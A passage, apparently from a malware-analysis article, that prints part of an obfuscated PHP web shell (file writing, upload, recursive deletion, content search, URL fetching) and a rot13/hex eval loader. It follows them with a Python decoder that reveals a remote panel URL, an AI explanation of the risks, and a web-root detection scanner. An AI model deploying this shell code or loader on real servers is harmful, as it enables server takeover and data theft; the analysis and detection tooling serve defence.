        $QSO8f .= "<input type=\"button\" value=\"一键JSC\" style=\"width:80px;\" onclick='txts(\"一键JSC\",\"" . $Jzwra . "\",\"JSC\");'> ";
        $QSO8f .= "</br>    ";
        $QSO8f .= "目录[" . $CU3_o . "] - 文件[" . $DOdBZ . "] - 属性[" . $RoNtC . "]</div></form>";
        return $QSO8f;
    }
}
function MWEmb($YJnbr)
{
    foreach ($YJnbr as $iW8f4 => $KPtbK) {
        $YJnbr[$iW8f4] = is_array($KPtbK) ? MweMb($KPtbK) : stripslashes($KPtbK);
    }
    return $YJnbr;
}
function pbm07($xndOv)
{
    return str_replace(array("\\", "//", "%27", "%22"), array("/", "/", "'", "\""), chop($xndOv));
}
function c4gHR($b00lT)
{
    $b00lT = pBM07($b00lT . "/");
    try {
        if (($bJ62o = @opendir($b00lT)) == NULL) {
            return false;
        }
    } catch (Throwable $yVbeC) {
        return false;
    }
    $YJnbr = array();
    while (false !== ($Kes_q = readdir($bJ62o))) {
        if ($Kes_q == "." || $Kes_q == "..") {
        }
        $PfRvL = $b00lT . $Kes_q;
        $Kes_q = strtr($Kes_q, array("'" => "%27", "\"" => "%22"));
        if (is_dir($PfRvL)) {
            $YJnbr["dir"][$PfRvL] = $Kes_q;
        }
        $YJnbr["file"][$PfRvL] = $Kes_q;
    }
    closedir($bJ62o);
    return $YJnbr;
}
function AXTtq()
{
    $QSO8f = '';
    if (isset($_POST["getpwd"])) {
        $QSO8f .= "<input type=\"hidden\" name=\"getpwd\" value=\"" . $_POST["getpwd"] . "\">";
    }
    if (isset($_POST["pass"])) {
        $QSO8f .= "<input type=\"hidden\" name=\"pass\" value=\"" . $_POST["pass"] . "\">";
    }
    if (isset($_POST["pass"]) && isset($_POST[$_POST["pass"]])) {
        $QSO8f .= "<input type=\"hidden\" name=\"" . $_POST["pass"] . "\" value=\"" . $_POST[$_POST["pass"]] . "\">";
    }
    if (isset($_POST["check"])) {
        $QSO8f .= "<input type=\"hidden\" name=\"check\" value=\"" . $_POST["check"] . "\">";
    }
    return $QSO8f;
}
function lGu3j($eb_7J, $NC0z_, $fyjvY)
{
    if (!is_writable($eb_7J) && file_exists($eb_7J)) {
        chmod($eb_7J, 0666);
    }
    $iW8f4 = false;
    try {
        $bJ62o = fopen($eb_7J, $fyjvY);
        $iW8f4 = fputs($bJ62o, $NC0z_);
        fclose($bJ62o);
    } catch (Throwable $yVbeC) {
    }
    return $iW8f4;
}
function JwptB($eb_7J)
{
    $bJ62o = fopen($eb_7J, "r");
    if (filesize($eb_7J) > 0) {
        $NC0z_ = fread($bJ62o, filesize($eb_7J));
    } else {
        $NC0z_ = '';
    }
    fclose($bJ62o);
    return $NC0z_;
}
function fiVRg($t_nY5, $fqqEu)
{
    $iW8f4 = move_uploaded_file($t_nY5, $fqqEu) ? true : false;
    if (!$iW8f4) {
        $iW8f4 = copy($t_nY5, $fqqEu) ? true : false;
    }
    return $iW8f4;
}
function VZo7e($eb_7J)
{
    if (!file_exists($eb_7J)) {
        return false;
    }
    ob_end_clean();
    $Kes_q = basename($eb_7J);
    $YJnbr = explode(".", $Kes_q);
    header("Content-type: application/x-" . array_pop($YJnbr));
    header("Content-Disposition: attachment; filename=" . $Kes_q);
    header("Content-Length: " . filesize($eb_7J));
    @readfile($eb_7J);
    exit;
}
function MRF0Q($b00lT)
{
    $bJ62o = @opendir($b00lT);
    while (false !== ($Kes_q = @readdir($bJ62o))) {
        if ($Kes_q == "." || $Kes_q == "..") {
        }
        $PfRvL = $b00lT . $Kes_q;
        @chmod($PfRvL, 0777);
        if (is_dir($PfRvL)) {
            Mrf0Q($PfRvL . "/");
        }
        @unlink($PfRvL);
    }
    @closedir($bJ62o);
    return @rmdir($b00lT);
}
function IDYFr($IMG07)
{
    if ($IMG07 < 1024) {
        return $IMG07 . " B";
    }
    $YJnbr = array("B", "K", "M", "G", "T");
    $bNTax = floor(log($IMG07) / log(1024));
    return sprintf("%.2f " . $YJnbr[$bNTax], $IMG07 / pow(1024, floor($bNTax)));
}
function iIPyZ($YJnbr, $g9_WW)
{
    foreach ($YJnbr as $iW8f4) {
        if (stristr($g9_WW, $iW8f4)) {
            return true;
        }
    }
    return false;
}
function MDXrQ($N8fwX = 8)
{
    $SWSuO = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9");
    $KYc_0 = array_rand($SWSuO, $N8fwX);
    $xndOv = '';
    if (is_int($KYc_0)) {
        $xndOv = $SWSuO[$KYc_0];
    } else {
        shuffle($KYc_0);
        foreach ($KYc_0 as $Hzx0E) {
            $xndOv .= $SWSuO[$Hzx0E];
        }
    }
    return $xndOv;
}
function dQr9r($b00lT, $iW8f4, $SMX_3, $f1bw2, $q52rn, $Ktp_B, $n_geq, $Nzv3E)
{
    try {
        if (($bJ62o = @opendir($b00lT)) == NULL) {
            return '';
        }
    } catch (Throwable $yVbeC) {
        return '';
    }
    $QSO8f = '';
    while (false !== ($Kes_q = readdir($bJ62o))) {
        if ($Kes_q == "." || $Kes_q == "..") {
        }
        $PfRvL = $b00lT . $Kes_q;
        if (is_dir($PfRvL)) {
            if (!($f1bw2 && in_array($Kes_q, $f1bw2))) {
                if ($n_geq == 0 && is_readable($PfRvL)) {
                    $QSO8f .= DqR9R($PfRvL . "/", $iW8f4, $SMX_3, $f1bw2, $q52rn, $Ktp_B, $n_geq, $Nzv3E);
                }
            }
        }
        if (!($SMX_3 && !iiPyz($SMX_3, $Kes_q))) {
            $uS2nL = $q52rn ? JwPtB($PfRvL) : $Kes_q;
            $A5Kw2 = $Ktp_B ? stristr($uS2nL, $iW8f4) : (strpos(iDyFr(filesize($PfRvL)), "M") ? false : strpos($uS2nL, $iW8f4) > -1);
            if ($A5Kw2) {
                $SFJ9z = strtr($PfRvL, array($Nzv3E => '', "'" => "%27", "\"" => "%22"));
                $QSO8f .= "<a href=\"javascript:go('editor','" . $SFJ9z . "');\">编辑</a> " . $PfRvL . "<br>";
                flush();
                ob_flush();
            }
            unset($uS2nL);
        }
    }
    closedir($bJ62o);
    return $QSO8f;
}
function cIVgh($N1G2o, $Q9zRG = 30, $kRKZ7 = 1)
{
    $c9X7t = curl_init();
    $PItFp = array("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Upgrade-Insecure-Requests: 1", "DNT:1", "Accept-Language: zh-CN,zh;q=0.9", "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36");
    curl_setopt($c9X7t, CURLOPT_HTTPHEADER, $PItFp);
    curl_setopt($c9X7t, CURLOPT_TIMEOUT, $Q9zRG);
    curl_setopt($c9X7t, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($c9X7t, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($c9X7t, CURLOPT_URL, $N1G2o);
    if ($kRKZ7 == 1) {
        curl_setopt($c9X7t, CURLOPT_RETURNTRANSFER, true);
    }
    $rVq02 = curl_exec($c9X7t);
    if (!$rVq02) {
        $VO03Y = curl_errno($c9X7t);
        var_dump($VO03Y);
    }
    curl_close($c9X7t);
    return $rVq02;
}
function x8024($xndOv, $Go0li = '', $wrqOC = '')
{
    if ($Go0li) {
        $xndOv = stristr($xndOv, $Go0li, false);
        $xndOv = substr($xndOv, strlen($Go0li));
    }
    $wrqOC && ($xndOv = stristr($xndOv, $wrqOC, true));
    return trim($xndOv);
}

// This is the encrypted version; I deleted most of the unencrypted data

<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
//$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim..
define('Viv, bebegim.','Denzel-���Ӣ��'); // ����
$a='';
function s(){
	global $a;
	global $a;
	$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323227292p617272617928272s272p272s272p275p27272p272227292p63686s702824737472";
	$str = str_rot13($str);
	$a = pack('H*',$str);
	m($str);
}
function m($str){
	global $password;
	global $a;
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	$jj = '/*123*/asdasdasd/*123*/';
	eval(str_ireplace("/*123*/asdasdasd/*123*/","",$jj).$a.str_ireplace("/*123*/asdasdasd/*123*/","",$jj));
}
s();
?>
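Both samples hide their strings behind reversible encodings, which can be undone statically without running any PHP. The decoder below is an added example, not part of the original article: the three constants are copied from the samples above (with single backslashes, as the dropper writes them to disk), and the function names are assumptions of this example.

```python
import codecs
import re

# Strings copied from the samples on this page.
ESCAPED_NAME = r"\x2e\x69\156\144\x65\170\x5f\142\x61\x6b\x2e\160\x68\x70"
ESCAPED_URL = (r"\x68\x74\164\160\x3a\57\57\x31\x35\x34\56\62\x30\x34\x2e\62\63\63"
               r"\56\61\x36\62\x2f\160\x61\156\145\154\56\164\x78\164")
ROT13_HEX = (
    "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s"
    "7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323227"
    "292p617272617928272s272p272s272p275p27272p272227292p63686s702824737472"
)

# Escapes PHP resolves inside a double-quoted string: \xHH (hex) and \NNN (octal).
_PHP_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def decode_php_escapes(text):
    """Resolve \\xHH and \\NNN escapes the way a PHP double-quoted string does."""
    def resolve(match):
        if match.group(1) is not None:
            return chr(int(match.group(1), 16))
        # PHP silently wraps octal values above 0377 to one byte.
        return chr(int(match.group(2), 8) & 0xFF)
    return _PHP_ESCAPE.sub(resolve, text)


def decode_rot13_hex(text):
    """Undo str_rot13() followed by pack('H*', ...) without executing the result."""
    hex_text = codecs.decode(text, "rot_13")
    if len(hex_text) % 2:
        hex_text += "0"  # pad a trailing odd nibble so the hex string is parseable
    return bytes.fromhex(hex_text).decode("latin-1")


if __name__ == "__main__":
    print(decode_php_escapes(ESCAPED_NAME))
    print(decode_php_escapes(ESCAPED_URL))
    print(decode_rot13_hex(ROT13_HEX))
```

The decoded names are useful as search terms in web-server logs and on disk; the rot13 and hex layer unwraps to the start of the same path-normalising helper that appears in the first sample.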
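AI's explanation

This PHP code appears to be a complex backdoor script, typically used for illegal purposes such as remotely controlling servers and stealing data. Scripts of this type are commonly called a "Web Shell" or "PHP Shell".

Security risks

  1. Remote code execution (RCE)
    • Through specific GET parameters, an attacker can upload and execute arbitrary PHP code.
    • This kind of vulnerability can lead to full control of the server, data leakage, or even more serious consequences.
  2. File operation permissions
    • The script allows creating directories, writing files and setting file permissions; these operations can be abused to damage the system or plant more malicious code.
  3. Session hijacking
    • The script authenticates through sessions and cookies; an attacker can gain control by stealing session information.
  4. Hidden functionality
    • The script contains some hidden functions and methods that may be used for further attacks or data theft.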
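
A web-root sweep for the artefacts the files on this page leave behind: the file names the panel writes, its payload patterns, and the backdated modification time it sets with touch(). This is an added example, not part of the original article; the rule names, the extension list and the one-day threshold are assumptions, and the sample tree is constructed with every payload line commented out.

```python
import os
import re
import time

# Content patterns matching the samples shown on this page.
CONTENT_RULES = {
    "eval-of-request-data": re.compile(rb"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "rot13-hex-eval": re.compile(rb"str_rot13.*?pack\s*\(\s*['\"]H\*.*?eval\s*\(", re.S),
    "escaped-string-run": re.compile(rb"(?:\\x[0-9a-fA-F]{2}|\\[0-7]{2,3}){8}"),
}
# File names the panel on this page writes into the directories it is pointed at.
DROP_NAMES = {".xm.php", ".index_bak.php", "gzl.php", "zrty.php", "index_copy.php"}
PHP_EXT = (".php", ".phtml", ".php5", ".phar")  # assumption: what the server executes
MAX_READ = 2 * 1024 * 1024                      # read at most 2 MiB per file


def inspect_file(path, backdate_gap=86400):
    """Return the signals raised by one file; an empty list means nothing found."""
    name = os.path.basename(path)
    signals = []
    if not name.lower().endswith(PHP_EXT):
        return signals
    if name in DROP_NAMES:
        signals.append("known-drop-name")
    if name.startswith("."):
        signals.append("hidden-php-dotfile")
    st = os.stat(path)
    # touch($file, $oldest_mtime) rewrites mtime only. On Linux/Unix st_ctime is
    # the inode change time and still records when the file was really written.
    # (On Windows st_ctime is creation time, so this check does not apply there.)
    # Archive extraction and timestamp-preserving syncs also produce this gap,
    # so treat it as a lead to compare against the last deployment time.
    if st.st_ctime - st.st_mtime > backdate_gap:
        signals.append("mtime-backdated")
    with open(path, "rb") as fh:
        data = fh.read(MAX_READ)
    for rule, pattern in CONTENT_RULES.items():
        if pattern.search(data):
            signals.append(rule)
    return signals


def scan_webroot(root):
    """Walk root and map relative path -> signals for every file that raised any."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                signals = inspect_file(path)
            except OSError:
                continue  # unreadable file: skip instead of aborting the sweep
            if signals:
                findings[os.path.relpath(path, root)] = signals
    return findings


def build_constructed_tree(root):
    """Write an inert, constructed sample tree (payload lines are PHP comments)."""
    os.makedirs(os.path.join(root, "uploads"))
    samples = {
        "index.php": b'<?php echo "hello";\n',
        ".xm.php": rb'<?php // inert: "\x2e\x69\156\144\x65\170\x5f\142\x61\x6b"',
        os.path.join("uploads", "gzl.php"): rb'<?php // inert: eval($_POST["constructed"]);',
        "theme.php": rb"<?php // inert: $s = str_rot13($s); $a = pack('H*', $s); eval($a);",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)
    # Backdate one file the way the panel does after writing it.
    old = time.time() - 400 * 86400
    os.utime(os.path.join(root, ".xm.php"), (old, old))


if __name__ == "__main__":
    import sys
    for rel, signals in sorted(scan_webroot(sys.argv[1]).items()):
        print(rel, ", ".join(signals))
```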